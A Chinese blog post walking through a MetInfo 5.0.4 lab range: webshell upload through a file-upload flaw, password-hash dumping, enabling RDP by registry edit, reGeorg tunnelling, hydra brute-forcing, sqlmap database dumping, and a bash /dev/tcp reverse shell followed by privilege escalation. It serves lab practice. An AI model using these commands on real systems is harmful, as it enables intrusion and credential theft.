靶场日记2-----MetInfocms靶场

最新推荐文章于 2024-05-03 00:15:07 发布
最新推荐文章于 2024-05-03 00:15:07 发布
阅读量2.1k 收藏 8
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Zer0ooo/article/details/103249786
版权

实验环境:

一个外网+两个内网
注:外网,可以访问到物理机,网卡为nat3;
物理机访问----->192.168.100.130

实验要求:

本环境共设置3个flag,在实验过程中不允许操作虚拟机。

步骤详解:

1.搭建环境,确保物理机ip为192.168.100.xxx网段。
在这里插入图片描述
2.物理机访问192.168.100.130,能够进入。并发现版本为MetInfo 5.0.4。
在这里插入图片描述
在这里插入图片描述

3.发现是cms,先收集信息,上网百度一波。(有疑惑的可参考:https://blog.csdn.net/Zer0ooo/article/details/103190622)
4.根据搜集的信息发现,有文件上传漏洞。
我是参考的这篇文章https://blog.csdn.net/key_book/article/details/80604830
5.在桌面新建一个1.html文档,利用漏洞上传大马。
(注:记得修改路径。)
在这里插入图片描述
6.用火狐(或谷歌)打开1.html,上传一句话木马。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

7.访问http://192.168.100.130/upload/file/1574390716.php,并测试成功。
在这里插入图片描述
8.用菜刀连接,成功后打开虚拟终端,whoami,发现是system权限。
在这里插入图片描述在这里插入图片描述

9.在回收站上传QuarksPwDump.exe,
在终端输入C:\RECYCLER\QuarksPwDump.exe --dump-hash-local获取密码。
在这里插入图片描述在这里插入图片描述

10.通过cmd5解码,账户名:Administrator 密码:a1b2c3(记住,下面会用到)
在这里插入图片描述

11.接下来尝试远程登录。
首先在终端输入netstat -ano,发现3389端口未开启。
在这里插入图片描述
开启3386端口命令:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
在这里插入图片描述
(注:若第一次3389端口没有开启成功,可尝试第二次。)
12.尝试远程登录。
在这里插入图片描述

发现报错!!!
在这里插入图片描述
没事!问题不大!不要“方”!
13.(敲黑板)知识点:一般开启了3389端口之后,仍然无法远程登录,有两个问题:
(1)开启了防火墙(2)NAT地址转换。NAT只转换80端口。
先尝试用命令把防火墙的3389端口打开。
在这里插入图片描述
再次尝试远程登录。成功!点击“是”。
在这里插入图片描述

14.通过上面破解的账号密码,远程登录。拿到flag1。
在这里插入图片描述在这里插入图片描述
15.进入外网后,ipconfig发现有两张网卡。
在这里插入图片描述

16.尝试在里面收集有用信息。
有两种情况:
(1)通过代理进行内网扫描。
(2)通过用户的历史记录。如,浏览器等。
17.尝试查看浏览器的历史记录。
在c:\Documents and Settings\Administrator\Local Setting\History下可以看到。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

18.接下来尝试爆破密码。
通过菜刀往win2003上传reGeorg-master/tunnel.nosocker.php
物理机访问 http://192.168.100.130/tunnel.nosocher.php
在这里插入图片描述
19.接下来打开kali,运行reGeorg-master
用hydra爆破密码
账号:admin
密码:123456
在这里插入图片描述
20.ftp登录成功!
在这里插入图片描述
21.找到flag2.
在这里插入图片描述
22.发现oa中有admin,尝试登录一下。
在这里插入图片描述

23.找到突破口,开始尝试寻找账号密码。
通过代码审计,发现message.php似乎有SQL注入漏洞。
在这里插入图片描述

24.尝试发现有SQL注入漏洞。
在这里插入图片描述
25.打开kali,用sqlmap暴库。
proxychains sqlmap -u http://10.200.1.16/message.php?id=1 -p id --technique=U --union-cols=2 --tamper space2comment --level 5 --risk 3 --dbs
在这里插入图片描述
proxychains sqlmap -u http://10.200.1.16/message.php?id=1 -p id --technique=U --union-cols=2 --tamper space2comment --level 5 --risk 3 -D my_oa --tables
在这里插入图片描述
proxychains sqlmap -u http://10.200.1.16/message.php?id=1 -p id --technique=U --union-cols=2 --tamper space2comment --level 5 --risk 3 -D my_oa -T admin --dump
在这里插入图片描述
26.获得账号、密码。登录oa系统。
在这里插入图片描述

27.上传大马,获取更多权限。
在这里插入图片描述

上传成功!
在这里插入图片描述

访问http://10.200.1.16/upload/images/20191124041440.php
密码:admin
28.whoami查看系统为Apache,需要提权。
在这里插入图片描述
在这里插入图片描述

29.先用nc监听5555端口
在这里插入图片描述
30. 接下来反弹端口。
在这里插入图片描述
在这里插入图片描述
用菜刀上传nc、ew到www目录下。
在这里插入图片描述
31.接着进行端口转发。
上传ew
先在192.168.100.130的cmd里切换到ew目录:ew_for_Win.exe -s lcx_tran -l 4444 -f 物理机ip地址 -g 5555
32.在大马命令行输入bash -i>& /dev/tcp/10.200.1.10/4444 0>&1
在物理机里切换到nc目录nc.exe -lvvp 555.
33.利用大马上传提权exp.
34.返回物理机,切换到大马上传的路径,更改exp权限(chomd 777 exp1),执行exp(./exp1),查看whoami,切换到root目录下即可看到flag3。
在这里插入图片描述

我ai记歌词
关注
  • 0
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
米拓建站系统(MetInfo CMS)文章定时发布软件
字节网盘SEO工具
02-12 330
简介: 米拓建站系统(MetInfo CMS)文章定时发布软件是一个网友根据自己需求写的文章发布辅助工具,能够帮助用户定时自动发布文章,这样就不用每天手动发文章啦,只需简单的操作就能轻松发布多篇文章,非常方便,有需要的朋友们可以下载使用,让文章发布变成一件非常容易的事情! 使用说明: 1.登录:首先在登陆窗口界面设置米拓建站(MetInfo CMS)的网站地址,测试版本是:V7.2.0,其它版本自测。如果是二级目录搭建的记得填完整,然后设置你的后台目录地址,默认是admin,输入账号密码获取验证码,登录即
墨者靶场 初级:CMS系统漏洞分析溯源(第7题)
qq_43233085的博客
01-18 828
墨者靶场 初级:CMS系统漏洞分析溯源(第7题)题目背景介绍实训目标解题方向解题步骤 题目 背景介绍 安全工程师对某即将上线的网站进行授权测试,发现是DEDECMS,请帮助工程师完成测试。 实训目标 1、掌握此版本任意用户密码重置漏洞利用; 2、了解漏洞形成原因使用方法; 解题方向 通过漏洞查看已存在账号的资料,获得管理员后台。 解题步骤 启动靶机,访问链接,发现有两个已存在的用户admin和t...
AtomCMS靶场
球球的博客
04-14 3870
AtomCMS建站软件,文件上传漏洞,xss漏洞
2024年最全Vulnstack红日安全内网域渗透靶场1实战_vulnstack靶场(2)
最新发布
2401_84302796的博客
05-03 784
该内网靶场的渗透实验,大概得折腾了我整整 3-4 天才做完(而且各种攻击不畅……),其中 Win7 跳板机执行域命令频繁报错如下(各种百度解决方案均行不通,如有知情大佬请赐教,感激不尽……):最后我发现在 Win7 上切换用户、登录域其他账户是偶尔可以成功执行域命令的:虽然最后拿下域控的结果是盗用大佬的图(自己没成功很不爽……),但是该靶场练习过程也学到了很多内网渗透的实战知识!比如 CS 与 MSF 如何联动、MSF 如何启 Windows 靶机的远程桌面、如何进行哈希传递攻击等。
web靶场搭建之帝国cms7.5
m0_60716947的博客
12-18 4018
帝国cms
大数据技术之数据安全与网络安全——CMS靶场(文章管理系统)实训
未来社会二十年发展的核心技术趋势由ABCD四个字母组成,分别是AI(人工智能)、BlockChain(区块链)、Cloud(云)、和Data(大数据)每一次进步都有新的认知和感触
11-25 3354
数据与网络安全作为保障大数据系统正常运行的基石,同样备受关注。今天写博客时候发现自己很久没更新数据安全与网络安全方面的内容了,于是花了点时间写一篇CMS靶场实训博客。本文通过CMS靶场实训,深入分析CMS系统的安全漏洞,探讨防范措施,提供实战经验和攻防能力,有助于加强大数据与网络安全意识。
web渗透cms靶场
weixin_49794194的博客
01-10 691
主页测试了很多地方漏洞还是比较多的,可能是系统比较老的原因,但是我们的目标主要是文件上传拿下webshell,这里我们找到了会员注册 然后成功跳转会员中心,发现可以插入新的新闻,或者上传个人头像 这里首先哥斯拉的php后缀改为jpg,因为这个靶场是文件类型验证,burp抓传数据包 将第21行的filename jpg更改为php上传,上传之后f12查看网页源代码看看文件被插去哪里了 这里看到data有会员资料上传的php应该是上传之后重命名,我们直接打哥斯拉连接 连接成功ipconfig,渗渗透靶场结束
服务器解析漏洞与cms靶场搭建教程
wutiangui的博客
07-01 1688
解析漏洞主要是一些特殊文件被Apache、IIS、Nginx等Web服务器在某种情况下解释成脚本文件格式并得以执行而产生的漏洞Apache(2.4.0~2.4.29)解析漏洞 CVE-2017-15715测试方法:test.php. 抓包修改.为test.php%0aApache AddHandler解析漏洞:从右到左识别httd.conf启:AddHandler application/x-httpd-php .phpIIS6 解析漏洞:*.asp;.jpg作为asp解析。
EmpireCMS4.5 渗透测试及靶场搭建(漏洞复现)
Continuejww的博客
08-30 2134
成功在网站根目录写入webshell连接蚁剑目录遍历图片内的栏目信息全部都含有如上图的xss漏洞。
cms文件管理系统靶场的手动SQL注入
qq_42589016的博客
06-17 1971
CSM文件管理系统SQL注入
利用docker搭建php7cms靶机
湿巾不湿
03-09 1485
前言 今天应师父要求,写一篇利用docker搭建渗透靶机的文章来记录一下自己的菜鸟时光,要求是小白照着一步一步走就能搭建成功(即使我也是小白)。想来想去还是从docker的安装说起吧。 一、docker的安装及相关配置 系统版本:centos7 内核版本:3.10.0 1、yum更新 [root@localhost /]# yum update 2、安装需要的软件包 [root@localhos...
易通企业网站系统CmsEasy v6.6_20181102.zip
07-06
易通企业网站系统CmsEasy 系统简介 易通企业网站系统也称易通企业网站程序,是易通公司发中国首套免费提供企业网站模板的营销型企业网站管理系统,系统前台生成html、完全符合SEO、同时有在线客服、潜在客户跟踪、便捷企业网站模板制作、搜索引擎推广等功能的企业网站系统。 易通企业网站系统CmsEasy v6.6_20181102 更新日志 修正表单导出Excel空白问题; 修正内容编辑器图片上传路径错误; 修正列表静态不显示内容多图调用错误; 修正自定义表单模板地址; 修正表单提交输入框宽度错误; 修正自定义html目录后,无法读取图库错误; 修正内页投票样式; 修正上传图片超过编辑框问题; 修正登录调用不兼容PHP7问题; 修正图片和附件上传大小设置错误; 修正栏目编辑导致排序返回0错误; 修正三个安全漏洞; 易通企业网站系统CmsEasy前台首页界面图 手机界面图:  易通企业网站系统CmsEasy 后台介绍 填写管理员信息后,点击安装,当看到,提示安装完成3秒后进入后台,即安装成功 CmsEasy管理后台路径:域名//index.php?admin_dir=admin 用户名与密码:安装时可设置 后台页面: 相关阅读 同类推荐:企业网站源码
cms靶场报错注入
weixin_58954236的博客
08-27 143
外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-cccNOLwS-1693124305344)(https://gitee.com/JIe1207/img/raw/master/img/202308231503787.png)]查看数据库中的表,数据库中的表名,列名在information_schema数据库中保存,查看information_schema数据库表,先查看cms中有多少表得到结果有8个表。得到数据库名、表名和列名,查看用户名和密码。得到用户名:admin。
cms靶场联合查询漏洞练习
Have_a_great_day的博客
08-27 377
1、联合查询:通过数据库的内容会回显到页面。利用union select 语句,该语句会同时执行两条select语句,来实现跨库,跨表查询。必要条件:1.两条select 语句查询结果具有相同的列数;2.对应的列数据类型一致。
搭建一个简易的靶场管理页面,让本地靶场不再混乱
m0_66423624的博客
10-03 1095
跟我靶场不一样的,修改一下名字就好。如果你连网站都懒得创建,可以直接把该html文件复制到之前创建好的随便一个靶场的根目录下,然后通过该靶场的ip+端口+/hack.html访问,然后设置书签,也能达到一样的效果。但是,还是有一点不便捷,对于我这种懒人,是不能接受的,总不能每次访问都去输入ip和文件名吧,这里我以kali中的火狐浏览器为例 ,右键单击图中位置,新建书签。实在是太麻烦了,奈何我才疏学浅,只能痛定思痛,苦学了一个小时的html和css,做一个简单的靶场管理的网页,代码不一定最优,但是勉强能用。
靶场练习笔记(2)
ben_bai_hen_cai的博客
11-22 516
靶场练习笔记(2) 环境:MetInfo5.0.4-CMS,一外两内 配置:外网地址192.168.100.130 目标:三个flag 一、信息收集 1、用御剑扫描后台,结果如图 2、百度搜MetInfo5.0.4-CMS漏洞。利用文件上传漏洞上传木马 原因:在百度搜索过程中发现有大佬说,MetInfo文件上传漏洞,影响了很多的MetInfo版本,与其学习其他漏洞,不如先学文件上传。 二、拿外网...
DC-6靶场下载及渗透实战详细过程(DC靶场系列)
金 帛的博客
08-02 1477
dc-6靶场详细渗透过程
aspcms 这个靶场。。。
weixin_30764771的博客
08-04 354
这个网站源码是我打 webug 里收集的靶场,但是由于我自己水平菜的不行,没搭建成功 = =!然后,我也就懒的搞,就给我一朋友,在他的公网服务器上搭上这个站,好让我玩玩。由于上次我朋友靶场发生挂黑页的事 = =!我只能全程打码了 = =! 打靶场,我们看到这是一个 aspcms 的源码,这不废话吗 = =!本来就是 aspcms靶场,而且你 ™ 还是白盒测试,但是,我们得佯装成啥都不知道的...
渗透靶场——Vulnhub:VulnCMS
tlovejr的博客
04-08 4926
前言 前几天一直在做HackMyVM系列靶场,今天正常看到了一个Vulnhub系列靶场,这个靶场里面是有3个cms漏洞,所以就那来做做看 1、主机存活探测 arp-scan -l 2、端口扫描 nmap -A -p- -T4 192.168.1.7 在这里会发现一共有3个模块端口,分别是5000端口的wordpress模板、8001端口的Joomla模板、9001端口的Drupal模板,针对这几个cms漏洞,那就直接对症下药,对应的模板用对应的工具去扫描 3、漏洞扫描 对于wordpress模板来
靶场笔记-----YXcms靶场
热门推荐
Zer0ooo的博客
11-21 1万+
靶场环境: 前言:YXcms是一款基于PHP+MYSQL构建的高效网站管理系统。 后台地址请在网址后面加上/index.php?r=admin进入。 后台的用户名:admin;密码:123456,请进入后修改默认密码。 1.如果看到是cms,先去搜集信息,百度一下该cms已出现的漏洞。我是根据这个网址发现的漏洞https://zhuanlan.zhihu.com/p/52099335 2.根据前言...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值